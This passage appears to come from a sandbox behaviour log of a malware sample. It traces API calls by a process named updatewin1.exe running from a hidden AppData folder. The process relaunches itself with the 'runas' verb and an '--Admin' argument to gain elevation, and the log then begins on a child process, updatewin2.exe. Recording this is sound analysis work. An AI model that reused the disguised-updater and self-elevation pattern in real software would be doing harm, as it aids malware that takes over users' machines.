lpProcName="InitializeSecurityDescriptor") returned 0x754c4620 [0080.180] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0080.180] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0080.180] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0080.180] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0080.180] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0080.180] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0080.180] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0080.181] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0080.181] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0080.181] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74390000 [0080.186] GetProcAddress (hModule=0x74390000, lpProcName="atexit") returned 0x743ac544 [0080.187] atexit (param_1=0x2363d8) returned 0 [0080.188] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x9bde4c40, dwHighDateTime=0x1d5d6b4)) [0080.188] GetCurrentThreadId () returned 0x2ac [0080.188] GetCurrentProcessId () returned 0x758 [0080.188] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=22062947281) returned 1 [0080.197] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0080.198] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.198] GetLastError () returned 0x57 [0080.199] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.199] GetLastError () returned 0x57 [0080.199] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0080.199] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0080.200] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.200] GetLastError () returned 0x57 [0080.200] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.200] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0080.202] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.202] GetLastError () returned 0x57 [0080.202] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.202] GetLastError () returned 0x57 [0080.202] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0080.202] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0080.203] GetProcessHeap () returned 0x220000 [0080.203] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.203] GetLastError () returned 0x57 [0080.203] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.203] GetLastError () returned 0x57 [0080.203] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0080.203] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x364) returned 0x24a9e8 [0080.203] SetLastError (dwErrCode=0x57) [0080.204] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xc00) returned 0x24ad58 [0080.206] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xb95fe1f8, hStdError=0xfffffffe)) [0080.206] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.206] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.207] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.207] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" " [0080.207] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" " [0080.207] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.207] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0080.207] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0080.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.207] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.207] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0080.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0080.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.307] GetLastError () returned 0x57 [0080.308] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0080.308] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.308] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0080.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ D\x06¹Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0080.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ D\x06¹Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.310] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x80) returned 0x24a0d0 [0080.311] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe")) returned 0x5f [0080.311] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xc8) returned 0x24c160 [0080.311] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0080.311] GetLastError () returned 0x0 [0080.312] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0080.312] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0080.320] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0080.321] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" " [0080.322] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x24d2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" [0080.322] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc0) returned 0x24d388 [0080.322] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" [0080.322] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4") returned 1 [0080.322] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0080.322] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0082.361] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x24d388 | out: hHeap=0x220000) returned 1 [0082.361] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0082.361] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0082.504] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x24a0d0 | out: hHeap=0x220000) returned 1 [0082.504] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x24cab0 | out: hHeap=0x220000) returned 1 [0082.504] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0082.504] GetLastError () returned 0x57 [0082.505] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0082.505] ExitProcess (uExitCode=0x0) [0082.506] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x24a9e8 | out: hHeap=0x220000) returned 1 [0082.508] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 49 os_tid = 0x684 Thread: id = 51 os_tid = 0x82c Thread: id = 52 os_tid = 0x83c Thread: id = 53 os_tid = 0x850 Process: id = "7" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe" page_root = "0x30b4a000" os_pid = "0x65c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 47 os_tid = 0x5e0 [0079.647] GetSystemTimeAsFileTime (in: 